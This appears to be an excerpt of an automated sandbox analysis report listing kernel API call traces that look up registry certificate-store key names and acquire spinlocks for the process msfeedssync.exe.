| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x100, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfe, ret_val_ptr_out = 0xffffe0003af8ff00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0xfe, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\3679CA35668772304D30A5FB873B0FA77BB70D54, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\3679CA35668772304D30A5FB873B0FA77BB70D54 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x100, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfe, ret_val_ptr_out = 0xffffe0003af8ff00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0xfe, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\3679CA35668772304D30A5FB873B0FA77BB70D54, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\3679CA35668772304D30A5FB873B0FA77BB70D54 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x100, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfe, ret_val_ptr_out = 0xffffe0003af8ff00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0xfe, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\36B12B49F9819ED74C9EBC380FC6568F5DACB2F7, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\36B12B49F9819ED74C9EBC380FC6568F5DACB2F7 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x100, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfe, ret_val_ptr_out = 0xffffe0003af8ff00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0xfe, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\36B12B49F9819ED74C9EBC380FC6568F5DACB2F7, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\36B12B49F9819ED74C9EBC380FC6568F5DACB2F7 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x100, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfe, ret_val_ptr_out = 0xffffe0003af8ff00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0xfe, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\36B12B49F9819ED74C9EBC380FC6568F5DACB2F7, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\36B12B49F9819ED74C9EBC380FC6568F5DACB2F7 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x100, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfe, ret_val_ptr_out = 0xffffe0003af8ff00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0xfe, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\3753D295FC6D8BC39B375650BFFC821AED504E1A, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\3753D295FC6D8BC39B375650BFFC821AED504E1A | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x100, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfe, ret_val_ptr_out = 0xffffe0003af8ff00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0xfe, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\3753D295FC6D8BC39B375650BFFC821AED504E1A, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\3753D295FC6D8BC39B375650BFFC821AED504E1A | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x100, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfe, ret_val_ptr_out = 0xffffe0003af8ff00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0xfe, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\3753D295FC6D8BC39B375650BFFC821AED504E1A, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\3753D295FC6D8BC39B375650BFFC821AED504E1A | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x100, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfe, ret_val_ptr_out = 0xffffe0003af8ff00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0xfe, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\379A197B418545350CA60369F33C2EAF474F2079, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\379A197B418545350CA60369F33C2EAF474F2079 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x100, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfe, ret_val_ptr_out = 0xffffe0003af8ff00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0xfe, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\379A197B418545350CA60369F33C2EAF474F2079, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\379A197B418545350CA60369F33C2EAF474F2079 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x100, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfe, ret_val_ptr_out = 0xffffe0003af8ff00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0xfe, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\379A197B418545350CA60369F33C2EAF474F2079, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\379A197B418545350CA60369F33C2EAF474F2079 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x100, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfe, ret_val_ptr_out = 0xffffe0003af8ff00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0xfe, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\37F76DE6077C90C5B13E931AB74110B4F2E49A27, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\37F76DE6077C90C5B13E931AB74110B4F2E49A27 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
|
For performance reasons, the remaining entries are omitted.
Click to download all entries as text file. |
|||||
Kernel Graph 50
Code Block #58 (EP #167)
»
| Information | Value |
|---|---|
| Trigger | KeAcquireSpinLockRaiseToDpc+0x2c |
| Start Address | 0xfffff800fc2b61e7 |
Execution Path #167 (length: 10, count: 1, processes: 1)
»
| Information | Value |
|---|---|
| Sequence Length | 10 |
Processes
»
| Process | Count |
|---|---|
| Process 107 (msfeedssync.exe, PID: 4172) | 1 |
Sequence
»
| Symbol | Parameters |
|---|---|
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x2 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c1b0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| IoCompleteRequest | ret_val_out = 0x1 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x2 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c1b0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c0b0 |
